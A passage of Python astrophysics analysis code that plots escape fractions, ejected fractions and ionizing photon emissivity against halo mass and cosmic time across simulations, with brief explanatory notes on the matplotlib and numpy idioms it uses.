Accepts a 3D array of the ejected fraction so we can plot for multiple models and redshifts.
Parameters
----------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
mean_mvir_ejected, std_mvir_ejected, N_ejected : Nested 3-dimensional array, mean_mvir_ejected[model_number0][snapshot0] = [bin0_meanejected, ..., binN_meanejected], with length equal to the number of models.
Mean/Standard deviation for the escape fraction binned into Halo Mass bins. N_ejected is the number of data points in each bin. Bounds are given by 'm_low' and 'm_high' in bins given by 'bin_width'.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Halo Mass is in units of log10(Msun).
'''
print("Plotting the Ejected Fraction as a function of halo mass.")
master_mean_ejected_halo, master_std_ejected_halo, master_N_ejected_halo, master_bin_middle_halo = \
collect_across_tasks(mean_mvir_ejected, std_mvir_ejected, N_ejected, SnapList,
PlotSnapList, True, m_low, m_high)
master_mean_ejected_z, master_std_ejected_z, master_N_ejected_z, _ = \
collect_across_tasks(mean_ejected_z, std_ejected_z, N_z, SnapList)
if rank == 0:
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
for model_number in range(0, len(SnapList)):
if(simulation_norm[model_number] == 1):
cosmo = AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
cosmo = AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
cosmo = AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
cosmo = AllVars.Set_Params_Kali()
for snapshot_idx in range(0, len(PlotSnapList[model_number])):
label = AllVars.SnapZ[PlotSnapList[model_number][snapshot_idx]]
ax1.plot(master_bin_middle_halo[model_number][snapshot_idx],
master_mean_ejected_halo[model_number][snapshot_idx],
color = PlotScripts.colors[snapshot_idx],
linestyle = PlotScripts.linestyles[model_number],
label = label, lw = PlotScripts.global_linewidth)
ax2.plot((AllVars.t_BigBang - AllVars.Lookback_Time[SnapList[model_number]]) * 1.0e3,
master_mean_ejected_z[model_number],
color = PlotScripts.colors[model_number],
label = model_tags[model_number],
ls = PlotScripts.linestyles[model_number],
lw = PlotScripts.global_linewidth)
for model_number in range(0, len(SnapList)): # Just plot some garbage to get the legend labels correct.
ax1.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
ax1.set_xlabel(r'$\log_{10}\ M_{\mathrm{vir}}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
ax1.set_ylabel(r'$\mathrm{Ejected \: Fraction}$', size = PlotScripts.global_fontsize)
ax1.set_xlim([8.0, 12])
ax1.set_ylim([-0.05, 1.0])
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(0.1))
ax1.yaxis.set_minor_locator(mtick.MultipleLocator(0.025))
leg = ax1.legend(loc=1, numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
outputFile = "./{0}{1}".format(output_tag, output_format)
fig1.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig1)
ax2.set_xlabel(r"$\mathbf{Time \: since \: Big \: Bang \: [Myr]}$", fontsize = PlotScripts.global_labelsize)
tick_locs = np.arange(200.0, 1000.0, 100.0)
tick_labels = [r"$\mathbf{%d}$" % x for x in tick_locs]
ax2.xaxis.set_major_locator(mtick.MultipleLocator(100))
ax2.set_xticklabels(tick_labels, fontsize = PlotScripts.global_fontsize)
ax2.set_xlim(PlotScripts.time_xlim)
ax2.set_ylabel(r'$\mathbf{Mean f_{ej}}$', fontsize = PlotScripts.global_labelsize)
ax3 = ax2.twiny()
t_plot = (AllVars.t_BigBang - cosmo.lookback_time(PlotScripts.z_plot).value) * 1.0e3 # Corresponding Time values on the bottom.
z_labels = ["$\mathbf{%d}$" % x for x in PlotScripts.z_plot] # Properly Latex-ize the labels.
ax3.set_xlabel(r"$\mathbf{z}$", fontsize = PlotScripts.global_labelsize)
ax3.set_xlim(PlotScripts.time_xlim)
ax3.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax3.set_xticklabels(z_labels, fontsize = PlotScripts.global_fontsize) # But label them as redshifts.
leg = ax2.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile2 = "./{0}_z{1}".format(output_tag, output_format)
fig2.savefig(outputFile2, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile2))
plt.close(fig2)
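The function above relies on a common matplotlib trick (see the "plot some garbage" loop): plotting `np.nan` data in black with each model's linestyle registers a legend entry per model without drawing anything visible. A minimal, self-contained sketch of that idea, using hypothetical model tags:

```python
import matplotlib
matplotlib.use("Agg")  # headless backend so this runs without a display
import matplotlib.pyplot as plt
import numpy as np

fig, ax = plt.subplots()
linestyles = ["-", "--", ":"]
for model_number, tag in enumerate(["Model A", "Model B", "Model C"]):
    # NaN data draws nothing visible but still registers a legend handle.
    ax.plot(np.nan, np.nan, color="k", linestyle=linestyles[model_number],
            label=tag)
leg = ax.legend(loc="upper left")
labels = [t.get_text() for t in leg.get_texts()]
plt.close(fig)
```

This keeps per-snapshot colours and per-model linestyles independent: the coloured curves carry the redshift labels, while the black NaN proxies carry the model labels.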
##
def plot_mvir_fesc(SnapList, mass_central, fesc, model_tags, output_tag):
'''
Plots the mean escape fraction as a function of halo virial mass (Mvir) for each model and snapshot.
Parallel compatible. Generates and saves the plot (named via output_tag).
'''
title = []
redshift_labels = []
mean_fesc_array = []
std_fesc_array = []
mean_halomass_array = []
std_halomass_array = []
bin_middle_array = []
for model_number in range(0, len(SnapList)):
redshift_labels.append([])
mean_fesc_array.append([])
std_fesc_array.append([])
mean_halomass_array.append([])
std_halomass_array.append([])
bin_middle_array.append([])
print("Plotting fesc against Mvir")
binwidth = 0.1
Frequency = 1
for model_number in range(0, len(SnapList)):
for snapshot_idx in range(0, len(SnapList[model_number])):
print("Doing Snapshot {0}".format(SnapList[model_number][snapshot_idx]))
tmp = 'z = %.2f' %(AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
redshift_labels[model_number].append(tmp)
minimum_mass = np.floor(min(mass_central[model_number][snapshot_idx])) - 10*binwidth
maximum_mass = np.floor(max(mass_central[model_number][snapshot_idx])) + 10*binwidth
minimum_mass = 6.0 # Overridden with a fixed range so all models/snapshots share identical bins.
maximum_mass = 12.0
binning_minimum = comm.allreduce(minimum_mass, op = MPI.MIN)
binning_maximum = comm.allreduce(maximum_mass, op = MPI.MAX)
halomass_nonlog = [10**x for x in mass_central[model_number][snapshot_idx]]
(mean_fesc, std_fesc, N, bin_middle) = AllVars.Calculate_2D_Mean(mass_central[model_number][snapshot_idx], fesc[model_number][snapshot_idx], binwidth, binning_minimum, binning_maximum)
mean_fesc_array[model_number], std_fesc_array[model_number] = calculate_pooled_stats(mean_fesc_array[model_number], std_fesc_array[model_number], mean_fesc, std_fesc, N)
mean_halomass_array[model_number], std_halomass_array[model_number] = calculate_pooled_stats(mean_halomass_array[model_number], std_halomass_array[model_number], np.mean(halomass_nonlog), np.std(halomass_nonlog), len(mass_central[model_number][snapshot_idx]))
## If we want the mean etc. of the halo mass, this script needs updating. ##
bin_middle_array[model_number].append(bin_middle)
mean_halomass_array[model_number] = np.log10(mean_halomass_array[model_number])
if rank == 0:
f = plt.figure()
ax1 = plt.subplot(111)
for model_number in range(0, len(SnapList)):
for snapshot_idx in range(0, len(SnapList[model_number])):
if model_number == 0:
title = redshift_labels[model_number][snapshot_idx]
else:
title = ''
mean = mean_fesc_array[model_number][snapshot_idx]
std = std_fesc_array[model_number][snapshot_idx]
bin_middle = bin_middle_array[model_number][snapshot_idx]
ax1.plot(bin_middle, mean, color = PlotScripts.colors[snapshot_idx], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = title)
#ax1.scatter(mean_halomass_array[model_number][snapshot_idx], np.mean(~np.isnan(mean)), color = PlotScripts.colors[snapshot_idx], marker = 'o', rasterized = True, s = 40, lw = 3)
if (len(SnapList) == 1):
ax1.fill_between(bin_middle, np.subtract(mean,std), np.add(mean,std), color = PlotScripts.colors[snapshot_idx], alpha = 0.25)
ax1.set_xlabel(r'$\log_{10}\ M_{\mathrm{vir}}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
ax1.set_ylabel(r'$f_\mathrm{esc}$', size = PlotScripts.global_fontsize)
#ax1.set_xlim([8.5, 12])
#ax1.set_ylim([0.0, 1.0])
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(0.1))
# ax1.yaxis.set_minor_locator(mtick.MultipleLocator(0.1))
# ax1.set_yscale('log', nonposy='clip')
# for model_number in range(0, len(SnapList)):
# ax1.plot(1e100, 1e100, color = 'k', ls = linestyles[model_number], label = model_tags[model_number], rasterized=True)
leg = ax1.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
outputFile = './' + output_tag + output_format
plt.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
##
def plot_mvir_Ngamma(SnapList, mean_mvir_Ngamma, std_mvir_Ngamma, N_Ngamma, model_tags, output_tag,fesc_prescription=None, fesc_normalization=None, fitpath=None):
'''
Plots the number of ionizing photons (pure ngamma times fesc) as a function of halo mass.
Parallel compatible.
The input data has been binned as a function of halo virial mass (Mvir), with the bins defined at the top of the file (m_low, m_high, bin_width).
Accepts 3D arrays to plot ngamma for multiple models.
Parameters
----------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
mean_mvir_Ngamma, std_mvir_Ngamma, N_Ngamma : Nested 2-dimensional array, mean_mvir_Ngamma[model_number0][snapshot0] = [bin0_meanNgamma, ..., binN_meanNgamma], with length equal to the number of bins.
Mean/Standard deviation/number of data points in each halo mass (Mvir) bin.
The number of photons is in units of 1.0e50 s^-1.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
output_tag : string
Name of the file that will be generated.
fesc_prescription : int (optional)
If this parameter is defined, we will save the Mvir-Ngamma results in a text file (not needed if not saving).
Number that controls what escape fraction prescription was used to generate the escape fractions.
0 : Constant, fesc = Constant.
1 : Scaling with Halo Mass, fesc = A*Mh^B.
2 : Scaling with ejected fraction, fesc = fej*A + B.
fesc_normalization : float (if fesc_prescription == 0) or `numpy.ndarray` with length 2 (if fesc_prescription == 1 or == 2) (optional).
If this parameter is defined, we will save the Mvir-Ngamma results in a text file (not needed if not saving).
Parameter not needed if you're not saving the Mvir-Ngamma results.
If fesc_prescription == 0, gives the constant value for the escape fraction.
If fesc_prescription == 1 or == 2, gives A and B with the form [A, B].
fitpath : string (optional)
If this parameter is defined, we will save the Mvir-Ngamma results in a text file (not needed if not saving).
Defines the base path for where we are saving the results.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Ngamma is in units of 1.0e50 s^-1.
'''
print("Plotting ngamma*fesc against the halo mass")
## Array initialization. ##
title = []
redshift_labels = []
mean_ngammafesc_array = []
std_ngammafesc_array = []
mean_halomass_array = []
std_halomass_array = []
bin_middle_array = []
for model_number in range(0, len(SnapList)):
redshift_labels.append([])
mean_ngammafesc_array.append([])
std_ngammafesc_array.append([])
mean_halomass_array.append([])
std_halomass_array.append([])
bin_middle_array.append([])
for model_number in range(0, len(SnapList)):
for snapshot_idx in range(0, len(SnapList[model_number])):
print("Doing Snapshot {0}".format(SnapList[model_number][snapshot_idx]))
tmp = 'z = %.2f' %(AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
redshift_labels[model_number].append(tmp)
N = N_Ngamma[model_number][snapshot_idx]
mean_ngammafesc_array[model_number], std_ngammafesc_array[model_number] = calculate_pooled_stats(mean_ngammafesc_array[model_number], std_ngammafesc_array[model_number], mean_mvir_Ngamma[model_number][snapshot_idx], std_mvir_Ngamma[model_number][snapshot_idx], N) # Collate the values from all processors.
bin_middle_array[model_number].append(np.arange(m_low, m_high+bin_width, bin_width)[:-1] + bin_width * 0.5)
if rank == 0:
f = plt.figure()
ax1 = plt.subplot(111)
for model_number in range(0, len(SnapList)):
count = 0
for snapshot_idx in range(0, len(SnapList[model_number])):
if model_number == 0:
title = redshift_labels[model_number][snapshot_idx]
else:
title = ''
mean = np.zeros((len(mean_ngammafesc_array[model_number][snapshot_idx])), dtype = np.float32)
std = np.zeros((len(mean_ngammafesc_array[model_number][snapshot_idx])), dtype=np.float32)
for i in range(0, len(mean)):
if(mean_ngammafesc_array[model_number][snapshot_idx][i] < 1e-10):
mean[i] = np.nan
std[i] = np.nan
else:
mean[i] = np.log10(mean_ngammafesc_array[model_number][snapshot_idx][i] * 1.0e50) # Remember that the input data is in units of 1.0e50 s^-1.
std[i] = 0.434 * std_ngammafesc_array[model_number][snapshot_idx][i] / mean_ngammafesc_array[model_number][snapshot_idx][i] # We're plotting in log space, so propagate the error: sigma_log10 = 0.434 * std / mean.
bin_middle = bin_middle_array[model_number][snapshot_idx]
if (count < 4): # Only plot at most 4 lines.
ax1.plot(bin_middle, mean, color = PlotScripts.colors[snapshot_idx], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = title, linewidth = PlotScripts.global_linewidth)
count += 1
## In this block we save the Mvir-Ngamma results to a file. ##
if (fesc_prescription is None or fesc_normalization is None or fitpath is None):
raise ValueError("You've specified you want to save the Mvir-Ngamma results but haven't provided an escape fraction prescription, normalization and base path name.")
# Note: All the checks that escape fraction normalization was written correctly were performed in 'calculate_fesc()', hence it will be correct by this point and we don't need to double check.
if (fesc_prescription[model_number] == 0): # Slightly different naming scheme for the constant case (it only has a float for fesc_normalization).
fname = "%s/fesc%d_%.3f_z%.3f.txt" %(fitpath, fesc_prescription[model_number], fesc_normalization[model_number], AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
elif (fesc_prescription[model_number] == 1 or fesc_prescription[model_number] == 2):
fname = "%s/fesc%d_A%.3eB%.3f_z%.3f.txt" %(fitpath, fesc_prescription[model_number], fesc_normalization[model_number][0], fesc_normalization[model_number][1], AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
f = open(fname, "w+")
if not os.access(fname, os.W_OK):
print("The filename is {0}".format(fname))
raise ValueError("Can't write to this file.")
for i in range(0, len(bin_middle)):
f.write("%.4f %.4f %.4f %d\n" %(bin_middle[i], mean[i], std[i], N_Ngamma[model_number][snapshot_idx][i]))
f.close()
print("Wrote successfully to file {0}".format(fname))
##
for model_number in range(0, len(SnapList)): # Just plot some garbage to get the legend labels correct.
ax1.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
ax1.set_xlabel(r'$\log_{10}\ M_{\mathrm{vir}}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
ax1.set_ylabel(r'$\log_{10}\ \dot{N}_\gamma \: f_\mathrm{esc} \: [\mathrm{s}^{-1}]$', size = PlotScripts.global_fontsize)
ax1.set_xlim([8.5, 12])
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(0.1))
leg = ax1.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
outputFile = './' + output_tag + output_format
plt.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
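The log-space error bar used in `plot_mvir_Ngamma` above, `0.434 * std / mean`, is first-order error propagation: since d(log10 x)/dx = 1/(x ln 10) and 1/ln 10 is approximately 0.434, a linear-space standard deviation `std` about a mean `mean` maps to a log10-space deviation of 0.434*std/mean. A small pure-numpy sketch with hypothetical bin values:

```python
import numpy as np

mean = np.array([2.0e3, 5.0e4])  # hypothetical linear-space bin means
std = np.array([4.0e2, 1.0e4])   # hypothetical linear-space standard deviations

log_mean = np.log10(mean)
# First-order propagation: sigma_log10(x) = std / (x * ln 10) ~= 0.434 * std / x
log_std = 0.434 * std / mean
```

Both hypothetical bins here have std/mean = 0.2, so both map to a log10-space deviation of about 0.087 dex.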
def bin_Simfast_halos(RedshiftList, SnapList, halopath, fitpath, fesc_prescription, fesc_normalization, GridSize, output_tag):
for model_number in range(0, len(fesc_prescription)):
for halo_z_idx in range(0, len(RedshiftList)):
snapshot_idx = min(range(len(SnapList)), key=lambda i: abs(SnapList[i]-RedshiftList[halo_z_idx])) # This finds the index of the simulation redshift that most closely matches the Halo redshift.
print("Binning Halo redshift {0}".format(RedshiftList[halo_z_idx]))
print("For the Halo redshift {0:.3f} the nearest simulation redshift is {1:.3f}".format(RedshiftList[halo_z_idx], SnapList[snapshot_idx]))
if (fesc_prescription[model_number] == 0):
fname = "%s/fesc%d_%.3f_z%.3f.txt" %(fitpath, fesc_prescription[model_number], fesc_normalization[model_number], AllVars.SnapZ[snapshot_idx])
elif (fesc_prescription[model_number] == 1 or fesc_prescription[model_number] == 2):
fname = "%s/fesc%d_A%.3eB%.3f_z%.3f.txt" %(fitpath, fesc_prescription[model_number], fesc_normalization[model_number][0], fesc_normalization[model_number][1], AllVars.SnapZ[snapshot_idx])
print("Reading in file {0}".format(fname))
## Here we read in the results from the Mvir-Ngamma binning. ##
f = open(fname, 'r')
fit_mvir, fit_mean, fit_std, fit_N = np.loadtxt(f, unpack = True)
f.close()
## Here we read in the halos created by Simfast21 ##
# The data file has the structure:
# long int N_halos
# Then an entry for each halo:
# float Mass
# float x, y, z positions.
# NOTE: The x,y,z positions are the grid indices but are still floats (because Simfast21 is weird like that).
Halodesc_full = [
('Halo_Mass', np.float32),
('Halo_x', np.float32),
('Halo_y', np.float32),
('Halo_z', np.float32)
]
names = [Halodesc_full[i][0] for i in range(len(Halodesc_full))]
formats = [Halodesc_full[i][1] for i in range(len(Halodesc_full))]
Halo_Desc = np.dtype({'names':names, 'formats':formats}, align=True)
fname = "%s/halonl_z%.3f_N%d_L100.0.dat.catalog" %(halopath, RedshiftList[halo_z_idx], GridSize)
f = open(fname, 'rb')
N_Halos = int(np.fromfile(f, count = 1, dtype = np.int64)[0]) # The catalog stores a 64-bit halo count; np.long has been removed from NumPy.
Halos = np.fromfile(f, count = N_Halos, dtype = Halo_Desc)
binned_nion = np.zeros((GridSize*GridSize*GridSize), dtype = np.float32) # This grid will contain the ionizing photons that result from the binning.
binned_Halo_Mass = np.digitize(np.log10(Halos['Halo_Mass']), fit_mvir) # Places the Simfast21 halos into the correct halo mass bins defined by the Mvir-Ngamma results.
binned_Halo_Mass[binned_Halo_Mass == len(fit_mvir)] = len(fit_mvir) - 1 # Fixes up the edge case.
## For each halo we now assign an ionizing flux. ##
# This flux is determined by drawing a random number from a normal distribution with mean and standard deviation given by the Mvir-Ngamma results.
# NOTE: Remember the Mvir-Ngamma results are in units of log10(s^-1).
fit_nan = 0
for i in range(0, N_Halos):
if(np.isnan(fit_mean[binned_Halo_Mass[i]]) or np.isnan(fit_std[binned_Halo_Mass[i]])): # This halo had a mass that was not covered by the Mvir-Ngamma fits.
fit_nan += 1
continue
nion_halo = np.random.normal(fit_mean[binned_Halo_Mass[i]], fit_std[binned_Halo_Mass[i]])
## Because of how Simfast21 does their binning, we have some cases where the Halos are technically outside the box. Just fix them up. ##
x_grid = int(Halos['Halo_x'][i])
if x_grid >= GridSize:
x_grid = GridSize - 1
if x_grid < 0:
x_grid = 0
y_grid = int(Halos['Halo_y'][i])
if y_grid >= GridSize:
y_grid = GridSize - 1
if y_grid < 0:
y_grid = 0
z_grid = int(Halos['Halo_z'][i])
if z_grid >= GridSize:
z_grid = GridSize - 1
if z_grid < 0:
z_grid = 0
idx = x_grid * GridSize*GridSize + y_grid * GridSize + z_grid
binned_nion[idx] += pow(10, nion_halo)/1.0e50
# print"We had %d halos (out of %d, so %.4f fraction) that had halo mass that was not covered by the Mvir-Ngamma results." %(fit_nan, N_Halos, float(fit_nan)/float(N_Halos))
# print "There were %d cells with a non-zero ionizing flux." %(len(binned_nion[binned_nion != 0]))
binned_nion = binned_nion.reshape((GridSize,GridSize,GridSize))
cut_slice = 0
cut_width = 512
nion_slice = binned_nion[:,:, cut_slice:cut_slice+cut_width].mean(axis=-1)*1.0e50
ax1 = plt.subplot(211)
im = ax1.imshow(np.log10(nion_slice), interpolation='bilinear', origin='lower', extent =[0,AllVars.BoxSize,0,AllVars.BoxSize], cmap = 'Purples', vmin = 48, vmax = 53)
cbar = plt.colorbar(im, ax = ax1)
cbar.set_label(r'$\mathrm{log}_{10}N_{\gamma} [\mathrm{s}^{-1}]$')
ax1.set_xlabel(r'$\mathrm{x} (h^{-1}Mpc)$')
ax1.set_ylabel(r'$\mathrm{y} (h^{-1}Mpc)$')
ax1.set_xlim([0.0, AllVars.BoxSize])
ax1.set_ylim([0.0, AllVars.BoxSize])
title = r"$z = %.3f$" %(RedshiftList[halo_z_idx])
ax1.set_title(title)
ax2 = plt.subplot(212)
w = np.where((Halos['Halo_z'][:] > cut_slice) & (Halos['Halo_z'][:] <= cut_slice + cut_width))[0]
x_plot = Halos['Halo_x'] * float(AllVars.BoxSize)/float(GridSize)
y_plot = Halos['Halo_y'] * float(AllVars.BoxSize)/float(GridSize)
z_plot = Halos['Halo_z'][w] * float(AllVars.BoxSize)/float(GridSize)
ax2.scatter(x_plot[w], y_plot[w], s = 2, alpha = 0.5)
ax2.set_xlabel(r'$\mathrm{x} (h^{-1}Mpc)$')
ax2.set_ylabel(r'$\mathrm{y} (h^{-1}Mpc)$')
ax2.set_xlim([0.0, AllVars.BoxSize])
ax2.set_ylim([0.0, AllVars.BoxSize])
tmp = "z%.3f" %(RedshiftList[halo_z_idx])
plt.tight_layout()
outputFile = './' + output_tag + tmp + output_format
plt.savefig(outputFile) # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
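`bin_Simfast_halos` above leans on two numpy idioms: `np.digitize` to place halo masses into the Mvir-Ngamma bins (with values beyond the top edge clamped back into the last bin), and the row-major flat index `x*GridSize*GridSize + y*GridSize + z` into the 3D grid, which `reshape` later undoes. A minimal sketch of both, using made-up bin edges and a tiny grid:

```python
import numpy as np

bin_edges = np.array([8.0, 9.0, 10.0, 11.0])  # hypothetical log10(Mvir) bin edges
masses = np.array([8.5, 10.2, 12.0])          # the last mass lies beyond the top edge

idx = np.digitize(masses, bin_edges)
idx[idx == len(bin_edges)] = len(bin_edges) - 1  # clamp the over-the-top edge case

GridSize = 4
x, y, z = 1, 2, 3
# Row-major flat index into a GridSize^3 grid, as used for binned_nion.
flat = x * GridSize * GridSize + y * GridSize + z
grid = np.zeros(GridSize ** 3)
grid[flat] += 1.0
# Reshaping recovers the same cell at [x, y, z].
assert grid.reshape((GridSize, GridSize, GridSize))[x, y, z] == 1.0
```

Note `np.digitize` returns 0 for values below the first edge and `len(bin_edges)` for values at or above the last, which is why the clamp line is needed before indexing the fit arrays.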
def plot_photoncount(SnapList, sum_nion, simulation_norm, FirstFile, LastFile, NumFiles, model_tags, output_tag):
'''
Plots the ionizing emissivity as a function of redshift.
We normalize the emissivity to Mpc^-3 and this function allows the read-in of only a subset of the volume.
Parallel compatible.
Parameters
----------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model, defines the x-axis we plot against.
sum_nion : Nested 1-dimensional array, sum_nion[z0, z1, ..., zn], with length equal to the number of redshifts.
Number of escape ionizing photons (i.e., photon rate times the local escape fraction) at each redshift.
In units of 1.0e50 s^-1.
simulation_norm : array of ints with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
FirstFile, LastFile, NumFiles : array of integers with length equal to the number of models.
The file numbers for each model that were read in (defined by the range between [FirstFile, LastFile] inclusive) and the TOTAL number of files for this model (we may only be plotting a subset of the volume).
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
sum_nion is in units of 1.0e50 s^-1.
'''
print("Plotting the ionizing emissivity.")
sum_array = []
for model_number in range(0, len(SnapList)):
if(simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
if(simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
else:
print("Simulation norm was set to {0}.".format(simulation_norm[model_number]))
raise ValueError("This option has been implemented yet. Get your head in the game Jacob!")
sum_array.append([])
for snapshot_idx in range(0, len(SnapList[model_number])):
nion_sum_snapshot = comm.reduce(sum_nion[model_number][snapshot_idx], op = MPI.SUM, root = 0)
if rank == 0:
sum_array[model_number].append(nion_sum_snapshot * 1.0e50 / (pow(AllVars.BoxSize / AllVars.Hubble_h,3) * (float(LastFile[model_number] - FirstFile[model_number] + 1) / float(NumFiles[model_number]))))
if (rank == 0):
ax1 = plt.subplot(111)
for model_number in range(0, len(SnapList)):
if(simulation_norm[model_number] == 0):
cosmo = AllVars.Set_Params_Mysim()
if(simulation_norm[model_number] == 1):
cosmo = AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
cosmo = AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
cosmo = AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
cosmo = AllVars.Set_Params_Kali()
else:
print("Simulation norm was set to {0}.".format(simulation_norm[model_number]))
raise ValueError("This option has been implemented yet. Get your head in the game Jacob!")
t = np.empty(len(SnapList[model_number]))
for snapshot_idx in range(0, len(SnapList[model_number])):
t[snapshot_idx] = (AllVars.t_BigBang - cosmo.lookback_time(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]).value) * 1.0e3
t = [t for t, N in zip(t, sum_array[model_number]) if N > 1.0]
sum_array[model_number] = [x for x in sum_array[model_number] if x > 1.0]
print("The total number of ionizing photons for model {0} is {1} s^1 Mpc^-3".format(model_number, sum(sum_array[model_number])))
print(np.log10(sum_array[model_number]))
ax1.plot(t, np.log10(sum_array[model_number]), color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[model_number], label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
#ax1.fill_between(t, np.subtract(mean,std), np.add(mean,std), color = colors[model_number], alpha = 0.25)
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(PlotScripts.time_tickinterval))
#ax1.yaxis.set_minor_locator(mtick.MultipleLocator(0.025))
ax1.set_xlim(PlotScripts.time_xlim)
ax1.set_ylim([48.5, 51.5])
ax2 = ax1.twiny()
t_plot = (AllVars.t_BigBang - cosmo.lookback_time(PlotScripts.z_plot).value) * 1.0e3 # Corresponding Time values on the bottom.
z_labels = ["$%d$" % x for x in PlotScripts.z_plot] # Properly Latex-ize the labels.
ax2.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax2.set_xlim(PlotScripts.time_xlim)
ax2.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax2.set_xticklabels(z_labels) # But label them as redshifts.
ax1.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_fontsize)
ax1.set_ylabel(r'$\sum f_\mathrm{esc}\dot{N}_\gamma \: [\mathrm{s}^{-1}\mathrm{Mpc}^{-3}]$', fontsize = PlotScripts.global_fontsize)
plot_time = 1
bouwens_z = np.arange(6,16) # Redshift range for the observations.
bouwens_t = (AllVars.t_BigBang - cosmo.lookback_time(bouwens_z).value) * 1.0e3 # Corresponding values for what we will plot on the x-axis.
bouwens_1sigma_lower = [50.81, 50.73, 50.60, 50.41, 50.21, 50.00, 49.80, 49.60, 49.39, 49.18] # 68% confidence intervals for the ionizing emissivity from Bouwens et al. (2015).
bouwens_1sigma_upper = [51.04, 50.85, 50.71, 50.62, 50.56, 50.49, 50.43, 50.36, 50.29, 50.23]
bouwens_2sigma_lower = [50.72, 50.69, 50.52, 50.27, 50.01, 49.75, 49.51, 49.24, 48.99, 48.74] # 95% CI.
bouwens_2sigma_upper = [51.11, 50.90, 50.74, 50.69, 50.66, 50.64, 50.61, 50.59, 50.57, 50.55]
if plot_time == 1:
ax1.fill_between(bouwens_t, bouwens_1sigma_lower, bouwens_1sigma_upper, color = 'k', alpha = 0.2)
ax1.fill_between(bouwens_t, bouwens_2sigma_lower, bouwens_2sigma_upper, color = 'k', alpha = 0.4, label = r"$\mathrm{Bouwens \: et \: al. \: (2015)}$")
else:
ax1.fill_between(bouwens_z, bouwens_1sigma_lower, bouwens_1sigma_upper, color = 'k', alpha = 0.2)
ax1.fill_between(bouwens_z, bouwens_2sigma_lower, bouwens_2sigma_upper, color = 'k', alpha = 0.4, label = r"$\mathrm{Bouwens \: et \: al. \: (2015)}$")
# ax1.text(0.075, 0.965, '(a)', horizontalalignment='center', verticalalignment='center', transform = ax.transAxes)
ax1.text(350, 50.0, r"$68\%$", horizontalalignment='center', verticalalignment = 'center', fontsize = PlotScripts.global_labelsize)
ax1.text(350, 50.8, r"$95\%$", horizontalalignment='center', verticalalignment = 'center', fontsize = PlotScripts.global_labelsize)
